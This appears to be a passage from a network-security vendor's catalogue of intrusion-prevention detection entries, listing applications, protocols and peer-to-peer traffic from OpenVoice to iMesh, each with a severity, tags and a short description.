Description: OpenText EIM software suites ans cloud services for ECM, BPM, CEM, Discovery and Information Exchange.
Back to top

OpenVoice

About this situation: Application OpenVoice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OpenVoice audio conferencing. Make announcements or hold discussions with up to 500 participants at a time with this high-quality, reservationless conference-calling service. OpenVoice includes both toll-free and toll-based options plus web controls for super-simple call moderation.
Back to top

OpenVPN

About this situation: OpenVPN traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-759-5211
Description: OpenVPN is an open source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities.
Back to top

OpenX

About this situation: OpenX usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-819-5242
Description: OpenX is an on-line advertising service.
Back to top

Opera

About this situation: Endpoint Context Agent based Opera Web Browser detection
Context: EI Correlation
Severity: 1
Tags: Web Browsers, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Opera web browser endpoint application has been detected.
Back to top

Opera GX

About this situation: Endpoint Context Agent based Opera GX detection
Context: EI Correlation
Severity: 1
Tags: Uncommon Web Browsers, Endpoint
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1547-5242
Description: Opera GX is a branch of the Opera browser built for gamers.
Back to top

Opera Installer

About this situation: Endpoint Context Agent based Opera Installer detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Opera Installer endpoint application has been detected. This application is used for installing the Opera web browser.
Back to top

Opera Neon

About this situation: Endpoint Context Agent based Opera Neon detection
Context: EI Correlation
Severity: 1
Tags: Web Browsers, Endpoint
First detected in: sgpkg-ips-1048-5242
Last changed: sgpkg-ips-1048-5242
Description: Opera Neon endpoint application has been detected.
Back to top

Opera Updater

About this situation: Endpoint Context Agent based Opera Updater detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Opera auto-updater endpoint application has been detected. This application is automatically used for updating the Opera web browser.
Back to top

Opera-Mini

About this situation: Opera Mini usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-759-5211
Description: Opera Mini is a web browsing service.
Back to top

Opera-My-Opera

About this situation: My Opera usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-630-5211
Description: My Opera is an online synchronization and social network for Opera web browser.
Back to top

Opera-Update

About this situation: Opera update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-767-5211
Description: This service is used to update Opera web browser and its components.
Back to top

Opera-VPN

About this situation: Opera VPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1237-5242
Description: Opera VPN is integrated feature in Opera web browser that can be used to bypass network protection features.
Back to top

operative

About this situation: Application operative detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Operative Media Inc. is an advertising business management company. Operative core purpose is to allow the media and advertising industries to run increasingly complex businesses with simplicity. Operative's next generation, SaaS based platform and technology-enabled services help media industry leaders and their partners balance operational efficiency with innovation to reduce transaction costs and boost advertising revenue.
Back to top

Opower

About this situation: Application Opower detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Opower provides cloud-based software to the utility industry and transforms the way utilities relate to their customers.
Back to top

Oprius

About this situation: Oprius usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Opscode

About this situation: Application Opscode detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Chef produces software allowing information technology departments to automate the process in which they configure, deploy and scale servers and applications.
Back to top

Optial-SmartStart

About this situation: Application Optial-SmartStart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Optial is a supplier of enterprise-wide Governance, Risk and Compliance
Back to top

Optimizely

About this situation: Optimizely usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1764-5242
Description: Optimizely usage detected. Optimizely is a web usage analytics platform.
Back to top

Optimum-Webmail

About this situation: Optimum WebMail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: A Web based mail service.
Back to top

Options-House

About this situation: Application Options-House detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Options House is an stock and option broking company that provides trading platforms for retail and institutional options.
Back to top

Optionsxpress

About this situation: OptionsXpress usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: OptionsXpress provides brokerage services for options, stock, futures, mutual funds, and fixed-income investments in the United States and internationally. Source: Wikipedia
Back to top

Optivo-broadmail

About this situation: Application Optivo-broadmail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Optivo offers a modern cloud solution for automated, sales-boosting one-to-one dialogue.
Back to top

Optmyzr

About this situation: Application Optmyzr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Optmyzr provides automated tools and solutions that enable powerful and easy management of PPC campaigns and accounts.
Back to top

Optum

About this situation: Application Optum detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Optum is a health services and innovation company dedicated to helping make the health system work better for everyone.
Back to top

Optum-Health-Bank

About this situation: Application Optum-Health-Bank detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Optum Bank, Member FDIC is dedicated to providing products and services that help make the health care system work better for everyone. Health savings accounts
Back to top

Optus

About this situation: Application Optus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Optus-is telecommunications company owns and operates its own network infrastructure, and also uses the wholesale services of the National Broadband Network.
Back to top

Oracle

About this situation: Oracle TNS protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-1212-5242
Description: TNS is a networking architecture that provides a uniform application interface to enable network applications to access the underlying network protocols transparently.
Back to top

Oracle-Cloud

About this situation: Oracle Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Oracle cloud provides a software as a service (SaaS), platform as a service (PaaS), and infrastructure as a service (IaaS). Now you can offload IT management and focus on growing your business.
Back to top

Oracle-Corporation

About this situation: Oracle online services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-773-5211
Description: Oracle online services usage was detected.
Back to top

Oracle-Java-Update

About this situation: Oracle Java Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-773-5211
Description: This service is used to update Opera web browser and its components.
Back to top

Oracle-VirtualBox

About this situation: Oracle VirtualBox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-632-5211
Description: VirtualBox is a virtualization platform.
Back to top

Orange-Cloud

About this situation: Application Orange-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud storage by Orange
Back to top

Orange-Tree-Employment-Screening

About this situation: Application Orange-Tree-Employment-Screening detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Orange Tree Employment Screening LLC provides employment screening and background checking services for companies and mid-sized organizations in the United States.
Back to top

OrangeScrum

About this situation: Application OrangeScrum detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Orangescrum is Project Management and Collaboration tool. It helps you to organize projects, team, documents and tasks at one place.
Back to top

Orb

About this situation: Orb usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-628-5211
Description: Orb is a streaming software which enables users to remotely access their personal digital media files from any Internet-enabled devices.
Back to top

Orbitfiles.com

About this situation: orbitfiles.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Orbitz

About this situation: Orbitz usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Orbitz allows to book airline tickets, hotel reservations, car rentals, vacations and travel deals.
Back to top

Orcon

About this situation: Application Orcon detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Orcon provides broadband services to homes and businesses, to a raft of hosting and domain services.
Back to top

OrderCloud

About this situation: Application OrderCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OrderCloud helps companies streamline the distribution of products, supplies, services and content to individuals or groups.
Back to top

Orderhive

About this situation: Application Orderhive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Orderhive is app which allows you to manage major business operations.Manage inventory, orders, contacts across multiple selling channels from a single interface. Get access to real-time analytics of your business data.
Back to top

OrderStorm

About this situation: Application OrderStorm detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OrderStrom is a web-based eCommerce solution that includes full order management for Wordpress websites.
Back to top

Ordoro

About this situation: Application Ordoro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ordoro is a web application for retailers that makes to manage orders, inventory and suppliers.
Back to top

Organizational Email

About this situation: Log in sites for corporate or institutional email systems.
Context: URL Application Context
Severity: 1
Tags: Internet Communication, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Log in sites for corporate or institutional email systems.
Back to top

Organizze

About this situation: Application Organizze detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Organizze is an online system for financial control easy to use. It's possible to make the control of personal finances and your business, that's because he has two versions: personal and business.
Back to top

Orgill

About this situation: Application Orgill detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Orgill, Inc. provides retailers across the United States and in more than 60 countries throughout the world access to over 75,000 products and industry-leading retail services.
Back to top

OrgPlus

About this situation: Application OrgPlus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Insperity provides an array of human resources and business solutions designed to help improve business performance. Insperity Business Performance Advisors offer the most comprehensive Workforce Optimization solution in the marketplace that delivers administrative relief, better benefits, reduced liabilities and a systematic way to improve productivity. Additional offerings include MidMarket Solutions, Performance Management, Expense Management, Time and Attendance, Organizational Planning, Recruiting Services, Employment Screening, Retirement Services and Insurance Services.
Back to top

Origin

About this situation: Endpoint Context Agent based Origin
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Electronic Arts Origin endpoint application has been detected.
Back to top

Ornavi

About this situation: Application Ornavi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ornavi - online project management software.
Back to top

OroCRM

About this situation: Application OroCRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OroCRM is an easy-to-use, open source CRM with built-in marketing tools for your Commerce business.
Back to top

Ororo-TV

About this situation: Ororo TV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-629-5211
Description: A web-based video-streaming service where users can watch videos using just a web browser.
Back to top

ORTEC

About this situation: Application ORTEC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ORTEC provides optimization software and analytics solutions. Its products and services result in optimized fleet routing and dispatch, vehicle and pallet loading, workforce scheduling, delivery forecasting, logistics network planning and warehouse control.
Back to top

osCommerce

About this situation: Application osCommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OsCommerce is an e-commerce and online store-management software program. It can be used on any web server that has PHP and MySQL installed.
Back to top

OSFGlobalServices

About this situation: Application OSFGlobalServices detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OSFGlobalServices is a cloud technology consultant and technology integrator, with cloud application development, integrated content management solutions, ecommerce platforms and enterprise CRM solutions.
Back to top

OSHA-Safety-Manage

About this situation: Application OSHA-Safety-Manage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OSHA Safety Manage is a complete, integrated system for automating your injury and accident logging, and your programs for preventing them
Back to top

OSHEPRO

About this situation: Application OSHEPRO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oshepro is a cloud based application allows small-large size companies develop and implement Occupational Safety, Health and Environmental programs.
Back to top

Osisoft

About this situation: Application Osisoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OSIsoft delivers the PI System, the industry standard in enterprise infrastructure, for management of real-time data and events. The OSIsoft PI System is used in manufacturing, energy, utilities, life sciences, data centers, facilities, and the process industries.
Back to top

Osmek

About this situation: osmek usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: In other words, users can enter content via http://cms.osmek.com and then a developer can build a site that "pulls" that content down from the cloud and displays it according to the users' specifications.The content is made available to the end-user version of the site via the Osmek API. This API is language neutral and can be accessed from across the internet.
Back to top

OSS-Solutions

About this situation: Application OSS-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OSS Solutions - service and Resource Order, Inventory, Incident and Problem Management
Back to top

Osuuspankki

About this situation: Osuuspankki usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: Osuuspankki usage detected. Osuuspankki is a finnish banking service.
Back to top

Osw3-Cloud

About this situation: OSW3 Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This system uses applications built on Web3.0 with html5 and does not use local hardware and software. Source: Wikipedia
Back to top

Other SSH messages than SSH_MSG_KEXINIT before or during SSH key exchange

About this situation: Other messages than the key exchange found.
Context: SSH without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-161-2032
Description: Other messages than SSH_MSG_KEXINIT found during the SSH key exchange. Usually, the SSH_MSG_KEXINIT should follow immediately the protocol versions. This situation is not against the SSH protocol specifications, but deviates from normal behaviour. Risk analysis: Risk level is low.
Back to top

Otixo

About this situation: Application Otixo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Otixo connects your favorite services (like Dropbox, Box, Google Docs, OneDrive, S3, SugarSync, FTP, etc.) so that you can access all your online files in once place.
Back to top

OurDisk

About this situation: Application OurDisk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OURDISK provides a secure, easy way to share files of all types and sizes. Solution for document management project collaboration.
Back to top

OurHealth

About this situation: Application OurHealth detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OurHealth company focused on solving challenges in healthcare through patient
Back to top

Outbrain

About this situation: Outbrain usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1086-5242
Description: Outbrain is an advertising platform whose content marketing module offers to help Internet publishers increase web traffic to their websites. Source: Wikipedia.
Back to top

Outlook-Web-Access

About this situation: Outlook Web Access usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-1698-5242
Description: Outlook Web Access is a webmail service of Microsoft.
Back to top

Outpost-Update

About this situation: Outpost Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: An Outpost event gives alerts when online updates for Outpost Firewall take place. Source: Agnitum
Back to top

Outright

About this situation: Outright usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Outright is a US accounting and bookkeeping application that assists small businesses and sole proprietors with managing their business income and expenses. It also provides them with a means to organize and categorize expenses for filing a Schedule C.Outright.com tracks and manages business income, expenses and tax liabilities.Source: Wikipedia
Back to top

Outsystems

About this situation: Application Outsystems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OutSystems offers a multi-channel application development platform, for the delivery of mobile and web enterprise applications, with extreme speed and flexibility.
Back to top

Ouya

About this situation: Ouya usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-1238-5242
Description: Usage of Ouya game console has been detected.
Back to top

Overclock.net

About this situation: Overclock.net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Discussion Forum, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-628-5211
Description: Overclock.net is a technology and performance related discussion forum.
Back to top

OverDrive

About this situation: OverDrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: OverDrive is a digital book delivery service.
Back to top

Overload handling disabled because load has subsided.

About this situation: Traffic has returned to normal and sensor is inspecting everything
Context: Sensor engine situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-239-3038
Last changed: sgpkg-ips-239-3038
Description: Overload handling was disabled due to load returning to normal.
Back to top

Overload handling enabled due to high load in sensor

About this situation: Inspection level will possibly degrade due to overload condition
Context: Sensor engine situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-239-3038
Last changed: sgpkg-ips-239-3038
Description: Part of the traffic will be bypassed because sensor can't inspect everything.
Back to top

Overnightprints

About this situation: Application Overnightprints detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Overnight Prints is one of the original online print companies. produce and deliver business cards, postcards, brochures and other vertical marketing products for almost a decade.
Back to top

OVH-Cloud

About this situation: Application OVH-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OVH Cloud storage spaces are short to medium term storage facilities available on demand and pay per as you go for amount of data stored.
Back to top

Owmessaging

About this situation: Application Owmessaging detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Openwave Messaging is the provider of innovative messaging solutions for service providers and enterprise companies. The world-class product portfolio includes a complete messaging environment optimized for today's most complex messaging requirements, including support for millions of mailboxes, unlimited storage, modern security controls, identity management, open APIs for internal and external integration, and a true five-nines messaging platform.
Back to top

Owncloud

About this situation: ownCloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1672-5242
Description: ownCloud is a free and open-source web application for data synchronization, file sharing, and cloud storage. ownCloud gives you universal access to your files through a web interface or WebDAV. It also provides a platform to easily view and sync your contacts, calendars and bookmarks across all your devices and enables basic editing right on the web.
Back to top

Owned-it

About this situation: Application Owned-it detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Owned it is an on-store conversion optimization tool enabling targeted marketing campaigns.
Back to top

OwnerIQ

About this situation: Application OwnerIQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OwnerIQ provides online advertising solutions and marketing channels for brands, retailers and manufacturers.
Back to top

Oxford-Dictionaries

About this situation: Application Oxford-Dictionaries detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oxford Dictionaries is an online dictionary of British English and American English from Oxford.
Back to top

OXID-eShop

About this situation: Application OXID-eShop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OXID eShop is an e-commerce solution that offers integrated Content Management System, optimized usability and shopping-experience and much more.
Back to top

Oxygen-Cloud

About this situation: Application Oxygen-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oxygen Cloud - private and public storage, all controllable by enterprise identity and policy.
Back to top

Oyatel-CallManager

About this situation: Application Oyatel-CallManager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Oyatel develops and sells Oyatel CallManager, one of the most advanced web based telephone system (SaaS) in Europe. The primary client for the system is a softphone. Oyatel Call Manager is integrated with 24SevenOffice ERP system. Oyatel AS are owned by 24SevenOffice ASA
Back to top

ozCart

About this situation: Application ozCart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ozCart is an eCommerce shopping cart that allows to offer secure online shopping to customers.
Back to top

OziBox

About this situation: Application OziBox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ozibox.com offers community online storage cloud for store, sync and share with friends.
Back to top

P2

About this situation: Application P2 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: P2 is the software and technology company dedicated to the upstream oil and gas industry, with solutions spanning the entire value chain from exploration to decommissioning.
Back to top

P2P-TCP_DirectConnect-Key

About this situation: Detects client login attempt to DirectConnect network
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, DirectConnect, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-516-5211
Vulnerability: DirectConnect-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_DirectConnect-Lock

About this situation: Detects server login prompt for DirectConnect network
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, DirectConnect, Any Operating System not specific, Peer to Peer, TCP Server Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-516-5211
Vulnerability: DirectConnect-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_ed2k-Connect-To-Peer

About this situation: ed2k p2p network peer connect attempt
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic P2P, Any Operating System not specific, Generic P2P not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-516-5211
Vulnerability: ed2k-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_ed2k-Connect-To-Server

About this situation: ed2k p2p network server connect attempt
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic P2P, Any Operating System not specific, Generic P2P not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-516-5211
Vulnerability: ed2k-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_FastTrack-Get

About this situation: File transfer attempts for FastTrack network detected
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, FastTrack, Any Operating System not specific, Peer to Peer, TCP Server Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-991-5242
Vulnerability: FastTrack-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_FastTrack-Give

About this situation: File transfer attempts for FastTrack network detected
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, FastTrack, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: FastTrack-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_Gnutella-Connect

About this situation: Detects new connection to Gnutella network
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Gnutella, Any Operating System not specific, Gnutella not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-516-5211
Vulnerability: Gnutella-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_Gnutella-Response

About this situation: Detects connection attempt responses to Gnutella network
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Gnutella, Any Operating System not specific, Gnutella not specific, Peer to Peer, TCP Server Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-516-5211
Vulnerability: Gnutella-Peer-To-Peer-Network-Usage
Description:
Back to top

P2P-TCP_iMesh-Peer-Access

About this situation: iMesh traffic
Context: Any TCP Client Stream
Severity: 2
